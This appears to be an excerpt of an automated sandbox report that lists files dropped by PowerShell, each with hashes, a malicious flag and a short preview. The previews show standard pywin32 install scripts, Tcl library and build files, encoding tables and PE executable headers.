                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):27255
                                                                                                                                                                                                                              Entropy (8bit):4.54686109057608
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:XOdxyBu5UtFTKxbNobBudHIZAN216JYUrV0Nqo43AllvC6c7e2wA0e7e8mim6BRG:edx4VW3gHKF/0ei/3Ywqdp3fkA9tt4
                                                                                                                                                                                                                              MD5:600FB28442DFF01C8AC81FB41D22069F
                                                                                                                                                                                                                              SHA1:3ECDBB8C321C08F1E3FD53E9F7D5DBA17133A46F
                                                                                                                                                                                                                              SHA-256:7B8B384CDFD514A001E9A2DB67081EBF5E21A57828E8333DE16CD29C7DC80070
                                                                                                                                                                                                                              SHA-512:40E5DFFA48CF567F5E23EB51BD1C626BFCD728E498880808F212E1E8A6A6C7C48CE2DC4AA3843620A8865D205B7AF5A87220AD2F37E644B56C1DEDE98FD51002
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# postinstall script for pywin32.#.# copies PyWinTypesxx.dll and PythonCOMxx.dll into the system directory,.# and creates a pth file.import glob.import os.import shutil.import sys.import sysconfig..try:. import winreg as winreg.except:. import winreg..# Send output somewhere so it can be found if necessary....import tempfile..tee_f = open(os.path.join(tempfile.gettempdir(), "pywin32_postinstall.log"), "w")...class Tee:. def __init__(self, file):. self.f = file.. def write(self, what):. if self.f is not None:. try:. self.f.write(what.replace("\n", "\r\n")). except IOError:. pass. tee_f.write(what).. def flush(self):. if self.f is not None:. try:. self.f.flush(). except IOError:. pass. tee_f.flush()...# For some unknown reason, when running under bdist_wininst we will start up.# with sys.stdout as None but stderr is hooked up. This work
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3721
                                                                                                                                                                                                                              Entropy (8bit):4.503953878580889
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:PPEYDOt7GfuKgqCgqgOEmgYl8AsOgN86VKmPJlCaUB2AIayrhKXyqMi:3f6wJgc6/hmPO/RyElMi
                                                                                                                                                                                                                              MD5:E1CAA86E2F353C27A56DB2611A7E2AF6
                                                                                                                                                                                                                              SHA1:B5B90B45976132E07D6E8B20B35C9A15E12A4CC1
                                                                                                                                                                                                                              SHA-256:034CF44AAE45AF89AD73AD2FC17A793792458B418607656B318530B24FA37670
                                                                                                                                                                                                                              SHA-512:756B397C4AFCC40E73BAAC22F29560F1A5D34D9F0A7A36BDF344EA81E656250717342759DDC43DCD37BA5DD3E004103DCB0E9D900A4D89E0F84ABDC9F2FE2BBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:"""A test runner for pywin32""".import os.import site.import subprocess.import sys..# locate the dirs based on where this script is - it may be either in the.# source tree, or in an installed Python 'Scripts' tree..this_dir = os.path.dirname(__file__).site_packages = [. site.getusersitepackages(),.] + site.getsitepackages()..failures = []...# Run a test using subprocess and wait for the result..# If we get an returncode != 0, we know that there was an error, but we don't.# abort immediately - we run as many tests as we can..def run_test(script, cmdline_extras):. dirname, scriptname = os.path.split(script). # some tests prefer to be run from their directory.. cmd = [sys.executable, "-u", scriptname] + cmdline_extras. print("--- Running '%s' ---" % script). sys.stdout.flush(). result = subprocess.run(cmd, check=False, cwd=dirname). print("*** Test script '%s' exited with %s" % (script, result.returncode)). sys.stdout.flush(). if result.returncode:. fa
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108445
                                                                                                                                                                                                                              Entropy (8bit):6.092435668278217
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Ga8:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+f8
                                                                                                                                                                                                                              MD5:ECD198A3A89C1D2A900C3DACA774C3D9
                                                                                                                                                                                                                              SHA1:C9C3673246425A147829649B6572CC7469429FAC
                                                                                                                                                                                                                              SHA-256:2E1751884945C4035322579261ACD01AE545A5D905BFEF0F38FDC9289EB876B5
                                                                                                                                                                                                                              SHA-512:33CC98E3C0963ADDA98210A1AE88B310372552972FA8A8A99B8E28E88F3C4198EC8026A328F3270DD270CC8EB15DFB62C2E980742F03DEEB4B872948BEBCA536
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):474
                                                                                                                                                                                                                              Entropy (8bit):4.6960996263721775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:kF3HTbyhnBIBAVYRby902MBIBLzDBIBL1Y6:kRH2IE024IRzNIRr
                                                                                                                                                                                                                              MD5:52A5B43A45344E8DE4FAD9F37E91C59B
                                                                                                                                                                                                                              SHA1:8FBA8792E4BF72682A1E6BFEAF9E5EA96C3E078C
                                                                                                                                                                                                                              SHA-256:64D08A3ABCB271DB3AF043C535E045F7C325348D87A349A76864637BAEDD2554
                                                                                                                                                                                                                              SHA-512:9A95C87D131F1AD4CA4132864E7F7E1821B4E24A084605D94B8748512EB5A197DCDCFD3D9AAC51DCE330E1E40A76E1C3EBA15F2D6E60AFCE0B898FCF433A7D3A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:if {[info sharedlibextension] != ".dll"} return..if {[package vsatisfies [package provide Tcl] 9.0-]} {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcl9dde14.dll] Dde]..} elseif {![package vsatisfies [package provide Tcl] 8.7]...&& [::tcl::pkgconfig get debug]} {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcldde14g.dll] Dde]..} else {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcldde14.dll] Dde]..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                              Entropy (8bit):5.531209790531261
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:cOKo+ZjdllRG1u6c9wPB7wbYSkyebfcm4gn:b0Ku6c9wJncd
                                                                                                                                                                                                                              MD5:BE471FCF9729B279197A3529AB76E7C1
                                                                                                                                                                                                                              SHA1:722DCDF864D09D5C0AFF0602A0DE6F6823FC16EE
                                                                                                                                                                                                                              SHA-256:2B6A1B97F9BAF246E0FD6A4052C02572724BFA37EBA0460D9069E39F382A1B3D
                                                                                                                                                                                                                              SHA-512:4C20DA557C5739E13A468B3EB879C1F9CA59B640017FC846C4A70707317DAF9E11D756296D942DCE0BCC4D2A8C30F5194A528E7A544D3178338C396D7267A529
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........nB..=B..=B..=...<@..=...<N..=...<J..=...<A..=...<C..=K.K=D..=...<G..=B..=...=...<C..=...<C..=...<C..=RichB..=................PE..d...3,.c.........." ...!.@...&.......B..............................................ZW....`.........................................`_..`...._..................................H...0Y...............................W..@............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...x....p.......\..............@....pdata...............^..............@..@.reloc..H............b..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21940
                                                                                                                                                                                                                              Entropy (8bit):5.325305906485699
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:9SE8+P0ztNKmUpX3Pyoa1X3PyoMhYpRv3nvE2v2wtmsCJEAgo4eT:sCmUpPFa1PFMhY/vdf4sgEAgo4G
                                                                                                                                                                                                                              MD5:F1C102426CF8A926AADF5CA9968F6F3C
                                                                                                                                                                                                                              SHA1:1DD3718D51A5EE6CA0E9DB09710A868B2076B746
                                                                                                                                                                                                                              SHA-256:3D4C390698EA24CB1C2AB0166C7C302EC056D841DC9F4B01979128824BCFC504
                                                                                                                                                                                                                              SHA-512:D34C91A0DC6643D02810DAAED1FB12F20695328C97C8E1A51913A6F8DD453914BDAEEEDDB65C548EBC5CEBD98E5402A4AA53032D000120223ED7121CA019D308
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:/*.. * ----------------------------------------------------------------------------.. * nmakehlp.c --.. *.. *.This is used to fix limitations within nmake and the environment... *.. * Copyright (c) 2002 by David Gravereaux... * Copyright (c) 2006 by Pat Thoyts.. *.. * See the file "license.terms" for information on usage and redistribution of.. * this file, and for a DISCLAIMER OF ALL WARRANTIES... * ----------------------------------------------------------------------------.. */....#define _CRT_SECURE_NO_DEPRECATE..#include <windows.h>..#ifdef _MSC_VER..#pragma comment (lib, "user32.lib")..#pragma comment (lib, "kernel32.lib")..#endif..#include <stdio.h>..#include <math.h>..../*.. * This library is required for x64 builds with _some_ versions of MSVC.. */..#if defined(_M_IA64) || defined(_M_AMD64)..#if _MSC_VER >= 1400 && _MSC_VER < 1500..#pragma comment(lib, "bufferoverflowU")..#endif..#endif..../* ISO hack for dumb VC++ */..#ifdef _MSC_VER..#define snprintf._snprintf..#endif.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):62846
                                                                                                                                                                                                                              Entropy (8bit):5.606177025504368
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:xaF+oYeZRyT+8Ch77407aW6myo2tlK9U7Z0knAL7K0gLWEtl4clFqcez:0yNTJw7WftlKyF0knAL7K0gLFb4mFwz
                                                                                                                                                                                                                              MD5:4EB69138710894A01F44E14D5EB83136
                                                                                                                                                                                                                              SHA1:5182B94DFD4F600A5DA7F72604C8727B0DC13342
                                                                                                                                                                                                                              SHA-256:7A830EBDBE6C06293FBB3F1CAB39EF51C55FBCACC13DF7713871C0E9BD875684
                                                                                                                                                                                                                              SHA-512:FD505DA9A9F3B90028C3B362BF2D50253BEEA5D6A5EC5F38EBA02F1F8CE17AA74ABC5EA6B05D72E10226E63E81CCF21C2B4699C40FAC1F0339D098EADFBF71DA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:#------------------------------------------------------------- -*- makefile -*-..# rules.vc --..#..# Part of the nmake based build system for Tcl and its extensions...# This file does all the hard work in terms of parsing build options,..# compiler switches, defining common targets and macros. The Tcl makefile..# directly includes this. Extensions include it via "rules-ext.vc"...#..# See TIP 477 (https://core.tcl-lang.org/tips/doc/main/tip/477.md) for..# detailed documentation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# Copyright (c) 2001-2003 David Gravereaux...# Copyright (c) 2003-2008 Patrick Thoyts..# Copyright (c) 2017 Ashok P. Nadkarni..#------------------------------------------------------------------------------....!ifndef _RULES_VC.._RULES_VC = 1....# The following macros define the version of the rules.vc nmake build system..# For modifications that are not backward-compat
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2606
                                                                                                                                                                                                                              Entropy (8bit):5.467909915722982
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:+v+e9BZMsMRDbvpwycYqUQniVuy2r5q+RX8hQg+IoAIoYYgXMgUFHgsgCg3+IoWn:4x9osWDDpwfY0aCltPgfoJoxgXMgwgsE
                                                                                                                                                                                                                              MD5:7D37AEAB54B232E1956055C601AD009A
                                                                                                                                                                                                                              SHA1:BC29520B636978112D7C64925BD35A7669F1E461
                                                                                                                                                                                                                              SHA-256:48F59BA7C8050DE1CE04EDE45F1F8A8488CFE7748BF9A0D845D550CD31451E2B
                                                                                                                                                                                                                              SHA-512:09B82E00A8B8B20D86C65B93F1DF2BA68726583A641B06B154B14448EC490B1B7827D11291FACC62389799D1BCA9B4F85F4F89DEB3550818AAA4DA86526B9732
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:#------------------------------------------------------------- -*- makefile -*-..# targets.vc --..#..# Part of the nmake based build system for Tcl and its extensions...# This file defines some standard targets for the convenience of extensions..# and can be optionally included by the extension makefile...# See TIP 477 (https://core.tcl-lang.org/tips/doc/main/tip/477.md) for docs.....$(PROJECT): setup pkgindex $(PRJLIB)....!ifdef PRJ_STUBOBJS..$(PROJECT): $(PRJSTUBLIB)..$(PRJSTUBLIB): $(PRJ_STUBOBJS)...$(LIBCMD) $**....$(PRJ_STUBOBJS):...$(CCSTUBSCMD) %s..!endif # PRJ_STUBOBJS....!ifdef PRJ_MANIFEST..$(PROJECT): $(PRJLIB).manifest..$(PRJLIB).manifest: $(PRJ_MANIFEST)...@nmakehlp -s << $** >$@..@MACHINE@. $(MACHINE:IX86=X86)..<<..!endif....!if "$(PROJECT)" != "tcl" && "$(PROJECT)" != "tk"..$(PRJLIB): $(PRJ_OBJS) $(RESFILE)..!if $(STATIC_BUILD).. $(LIBCMD) $**..!else.. $(DLLCMD) $**.. $(_VC_MANIFEST_EMBED_DLL)..!endif.. -@del $*.exp..!endif....!if "$(PRJ_HEADERS)
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):87
                                                                                                                                                                                                                              Entropy (8bit):4.318506571923692
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:OuMvdQ5FmFA3Bnzj3PHGv:OuEQ5F1BPPY
                                                                                                                                                                                                                              MD5:F6EF2EE18C48F4AFA415A117A9E59356
                                                                                                                                                                                                                              SHA1:9EDD8582FD49A3B0255D1C3B4B30244A4E27D155
                                                                                                                                                                                                                              SHA-256:03589B111B1A9A4DACA7FC3014F9F0ADE84E875948BE925E30726423C063089E
                                                                                                                                                                                                                              SHA-512:45D2BEFCB6EC99B287678773F97221DCB71678E8A0BFCF6E9F1D24703617E36B7D7917D7460A6E5E9136ADF8B389F7802AC2BEB0171A9F2DBE8D0F7F00F3E073
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:CORE_MACHINE = AMD64..CORE_DEBUG = 0..CORE_TCL_THREADS = 1..CORE_USE_THREAD_ALLOC = 1..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                              Entropy (8bit):4.94441225384733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:OSZ/JKNZKZCGRHJPth4VKAvDgDJgoku8:OSQQTRJPzkKAEN
                                                                                                                                                                                                                              MD5:ABBD49C180A2F8703F6306D6FA731FDC
                                                                                                                                                                                                                              SHA1:D63F4BFE7F74936B2FBACE803E3DA6103FBF6586
                                                                                                                                                                                                                              SHA-256:5F411C0BD9ED9A42B0F07ED568C7D0CF358A83063B225A1F8F7DA3296DDE90F1
                                                                                                                                                                                                                              SHA-512:290DD984ACC451B778F3DB8C510BAE7AEC1D9547C3AD0A1829DF731C136E4ECC9A37DC6A786CF8F1ECC4D14339AED1288AF25055F450F6F953138C8D4D5C36E9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./.... .....`................@.............................................. ..............................................................`...............................................U..(...................................................text...X,..........................`.P`.data........@.......2..............@.`..rdata..@....P.......<..............@.`@.pdata.......`.......L..............@.0@.xdata.. ....p.......P..............@.0@.bss.... .............................`..idata...............T..............@.0..CRT....h............`..............@.@..tls.................b..............@.@.........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):367
                                                                                                                                                                                                                              Entropy (8bit):4.633662369394115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:CsUgabAOgjD/0JDKykDjvFJbCfX7MQ9Q3dEIBSGERWZof7MQ9Q3dEIBSGzI8W6:lGbyCWF3HgGdEIBewZ/dEIBRIH6
                                                                                                                                                                                                                              MD5:2432EB4BB85317F6C0D1CB14234664B3
                                                                                                                                                                                                                              SHA1:61A9827F5CE90B47B1FC0C7D7C7470CB3313787B
                                                                                                                                                                                                                              SHA-256:1BD0FC8CBA2BB1CDD5E5CFCC614B0EF4C8CF4698904D1E48C0F103519C5579E0
                                                                                                                                                                                                                              SHA-512:DEE270A417BBDACCED81A92E27A6BD94304B074EF20F1506DF8EB1A7B5CA85E6F156A569356B1027F9E2673A8E091213C14DDB7B97F0E4526E0F6659E6C6F5C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:if {![package vsatisfies [package provide Tcl] 8.5]} return..if {[info sharedlibextension] != ".dll"} return..if {[::tcl::pkgconfig get debug]} {.. package ifneeded registry 1.3.5 \.. [list load [file join $dir tclreg13g.dll] Registry]..} else {.. package ifneeded registry 1.3.5 \.. [list load [file join $dir tclreg13.dll] Registry]..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22016
                                                                                                                                                                                                                              Entropy (8bit):5.504085917381921
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Egd2+KQiARRvWDEBAYdCRVv9evQqlXETxjEf9+zxYwDeXyLAfQI:tARqvWDsPCRVNqlX7SxxDKyMF
                                                                                                                                                                                                                              MD5:50BD70865CD710FF916CF7D5D3F6087B
                                                                                                                                                                                                                              SHA1:42D25E2ADE2A29114FD11789E97B780F7748CB9C
                                                                                                                                                                                                                              SHA-256:3CC348B30B1B7C130AA7ADBD325972FB91A475895B1AB827150BDB923FA6A5D6
                                                                                                                                                                                                                              SHA-512:A1F97A36EB98B99EEEA61257B2411FDFCBD3DC9CE38AEBF10A16018EC9C2FF1AB916A6A4FA4781AAAC1F7D53F0FE5C424E4C67715E38ED37EE8FF7475A36FADA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.5.r.[.r.[.r.[..Z.p.[..^.~.[.._.z.[..X.q.[..._.s.[.{..t.[...Z.u.[.r.Z.F.[...S.s.[...[.s.[...Y.s.[.Richr.[.........PE..d...3,.c.........." ...!.2...&...... 6..............................................xv....`.........................................0`..h....`..................................\...PY...............................X..@............P...............................text...H1.......2.................. ..`.rdata.......P.......6..............@..@.data...h....p.......N..............@....pdata...............P..............@..@.reloc..\............T..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21523
                                                                                                                                                                                                                              Entropy (8bit):4.827830596623684
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:UqT9XC9VZv9QXCTxsCTHI7672ORgS0mzBvxFRTX7Xvt3wBTnFXhCUvuyqz:LT9XC9VZviXCVsCLI7JlmzBvTxvt3gTW
                                                                                                                                                                                                                              MD5:08EDF746B4A088CB4185C165177BD604
                                                                                                                                                                                                                              SHA1:395CDA114F23E513EEF4618DA39BB86D034124BF
                                                                                                                                                                                                                              SHA-256:517204EE436D08EFC287ABC97433C3BFFCAF42EC6592A3009B9FD3B985AD772C
                                                                                                                                                                                                                              SHA-512:C1727E265A6B0B54773C886A1BCE73512E799BA81A4FCEEEB84CDC33F5505A5E0984E96326A78C46BF142BC4652A80E213886F60EB54ADF92E4DFFE953C87F6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# auto.tcl --..#..# utility procs formerly in init.tcl dealing with auto execution of commands..# and can be auto loaded themselves...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# auto_reset --..#..# Destroy all cached information for auto-loading and auto-execution, so that..# the information gets recomputed the next time it's needed. Also delete any..# commands that are listed in the auto-load index...#..# Arguments:..# None.....proc auto_reset {} {.. global auto_execs auto_index auto_path.. if {[array exists auto_index]} {...foreach cmdName [array names auto_index] {... set fqcn [namespace which $cmdName]... if {$fqcn eq ""} {....continue... }... rename $fqcn {}...}.. }.. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath.. if {
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):133439
                                                                                                                                                                                                                              Entropy (8bit):5.044814789288095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Cbn4IAhYvuCg9epsArAzqpSMpWzP7ejMiIAxBPqGYkPAPaZpHYM8EN4LhVLlarXL:Cbn4IM9epsArSqpSMpWzP7ejM/eBPqG3
                                                                                                                                                                                                                              MD5:88BB44A1364147FDD80F9FD78FBCEF61
                                                                                                                                                                                                                              SHA1:2C3454D2669F0CA83FECF17976D599C85B86E615
                                                                                                                                                                                                                              SHA-256:1947F8B188AB4AB6AA72EA68A58D2D9ADD0894FDF320F6B074EAE0F198368FB7
                                                                                                                                                                                                                              SHA-512:010B13E8A2D50521B5D7ADCC5F32F7CDE3F12E1053961C575D967DC6CFD368640BF45D23832E5E9C3868CDCA9FE0505698F949C5557D4169353634C94AA196B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:#----------------------------------------------------------------------..#..# clock.tcl --..#..#.This file implements the portions of the [clock] ensemble that are..#.coded in Tcl. Refer to the users' manual to see the description of..#.the [clock] command and its subcommands...#..#..#----------------------------------------------------------------------..#..# Copyright (c) 2004-2007 Kevin B. Kenny..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#----------------------------------------------------------------------....# We must have message catalogs that support the root locale, and we need..# access to the Registry on Windows systems.....uplevel \#0 {.. package require msgcat 1.6.. if { $::tcl_platform(platform) eq {windows} } {...if { [catch { package require registry 1.1 }] } {... namespace eval ::tcl::clock [list variable NoRegistry {}]...}.. }..}....# Put the library directory in
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):2.1033474959326957
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:5c2VBUvEWVrVJ/eyN9j2iV2NdWWT0VbusV7EV7KVAMmVZyd851VFpsGkliX:5HVBUlJvRj7SOVbusZhAMiZyi77qsX
                                                                                                                                                                                                                              MD5:9E3A454FA480E9A99D2D5ACDAA775233
                                                                                                                                                                                                                              SHA1:493637BB570A5C96BB62F998BD0391FB59AFC5F0
                                                                                                                                                                                                                              SHA-256:FB87BF197F4F485B08EA81F7534BC07D9C3A538D022424BE11011A1FE3C413FD
                                                                                                                                                                                                                              SHA-512:EDFCB2BB6AB052D28D5CEBD08AD57F36D3A4CB83D557B1359B0ADE1266E24D8F3CE87B8240881396A5BA4FB45F8B74014784E8885CDB86680D98977CC0D130F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: ascii, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):94389
                                                                                                                                                                                                                              Entropy (8bit):3.3217406555698195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:UAHU3LIkZlmXrd/uQ0ao98zgKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fd:UVduBGf94gFMT6q95GDRBfd
                                                                                                                                                                                                                              MD5:41A874778111CC218BD421CF9C795EC2
                                                                                                                                                                                                                              SHA1:80857D106F71199CE187833D38DB091A819A520C
                                                                                                                                                                                                                              SHA-256:AD1ED201B69855BFD353BF969DFC55576DA35A963ABF1BF7FC6D8B5142A61A61
                                                                                                                                                                                                                              SHA-512:4244624124F86A3EFAB4C70B115A46C8ADF02D708860FA5F327CDBFA24BC3F9EFAD0C6EE58DE96B0B6BBC4CF6D99B322BB8657129007C86D6482F41C1503AAD4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: big5, multi-byte..M..003F 0 89..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98634
                                                                                                                                                                                                                              Entropy (8bit):2.438904802083714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:MPFOsOKqBLPf62X4lgQeLHj6RHUn0TQb8G47Ianrd28gr:MPAsknjX4OQe7aoMMarAFr
                                                                                                                                                                                                                              MD5:B6A7C59E6A48D91CC2DBCB2BBA7E4510
